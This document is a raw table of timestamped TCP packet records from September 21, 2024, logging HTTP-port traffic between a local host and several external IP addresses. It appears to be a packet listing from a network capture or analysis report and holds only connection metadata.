Sep 21, 2024 14:48:09.568723917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568726063 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568738937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568758965 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568778038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.568941116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.568953991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569005013 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569062948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569073915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569083929 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569088936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569098949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569108009 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569112062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569123983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569149017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569181919 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569380999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569396019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569406986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569425106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569437981 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569438934 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569453001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569462061 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569463015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569475889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569487095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569500923 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569503069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569530010 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569547892 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.569902897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569915056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569925070 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569935083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569946051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569957018 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569962025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569967031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569972038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569977999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.569988966 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570035934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570317030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570329905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570339918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570353985 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570373058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570377111 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570384979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570395947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570404053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570406914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570419073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570426941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570432901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570449114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570467949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570497036 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.570970058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570981026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.570991993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571002960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571012974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571023941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571031094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571036100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571047068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571058035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571068048 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571069956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571083069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571090937 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571094036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571106911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571113110 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571118116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571129084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571135044 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571141958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571152925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571161032 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571166039 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571177959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571178913 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571208000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571237087 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571759939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571773052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571783066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571794987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571827888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571861982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571939945 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571952105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571963072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571974039 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571985006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.571989059 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.571996927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572015047 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572016001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572029114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572030067 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572041035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572052002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572060108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572072983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572072983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572083950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572098017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572108030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572113991 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572124958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572139978 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572165012 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572890997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572904110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572913885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572925091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572935104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572947025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572957993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572958946 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572971106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572983027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.572987080 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.572997093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573008060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573010921 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573019028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573029995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573033094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573043108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573055983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573056936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573067904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573079109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573081017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573091984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573106050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.573111057 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573143959 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573162079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.573689938 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573700905 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573710918 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573759079 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573772907 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573786020 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573786974 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573822975 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573833942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573839903 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573867083 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573899984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573930979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573941946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573952913 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.573973894 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.573998928 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.574527979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.574587107 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.574604988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.574651957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.613179922 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613198996 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613209009 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613219976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613297939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613308907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613387108 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.613389015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613400936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613425016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613457918 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.613476992 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.613907099 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613934994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613949060 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.613969088 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.613990068 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614074945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614087105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614095926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614101887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614128113 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614175081 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614207029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614253998 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614842892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614902973 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614916086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614928007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.614968061 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.614994049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615005970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615015984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615045071 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.615077019 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.615142107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615154028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615194082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.615849972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615892887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615909100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615917921 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.615953922 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.615986109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.615998030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.616035938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.623729944 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.623779058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.623790979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.623807907 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.623837948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.642386913 CEST	80	49718	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:09.642505884 CEST	49718	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:09.642721891 CEST	49718	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:09.646234989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.646315098 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.647507906 CEST	80	49718	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:09.659462929 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659473896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659485102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659528971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659610987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659621954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659632921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659641981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659652948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659677982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659677982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659677982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659677982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659717083 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659758091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659770012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659780025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659791946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659801960 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659825087 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659857035 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659889936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659902096 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659910917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659920931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.659943104 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.659970999 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660031080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660043955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660053968 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660075903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660104990 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660150051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660161018 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660177946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660187960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660197973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660198927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660227060 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660249949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660258055 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660295010 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660362959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660373926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660382986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660393953 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660406113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660413027 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660434008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660449028 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660525084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660536051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660545111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660557032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660573959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660579920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660587072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660602093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660602093 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660614014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660624981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660629988 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660651922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660670042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660854101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660865068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660876036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660887003 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660908937 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660952091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660963058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.660985947 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.660986900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.661017895 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.661115885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661128044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661138058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661148071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661158085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661170006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.661170006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661183119 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661194086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.661201000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.661221981 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.661233902 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.670864105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.670875072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.670886040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.670958996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671011925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671022892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671032906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671046972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671159029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671159029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671159029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671184063 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671201944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671212912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671224117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671231985 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671237946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671250105 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671274900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671408892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671453953 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.671546936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.671559095 CEST	80	49712	103.130.147.211	192.168.2.9
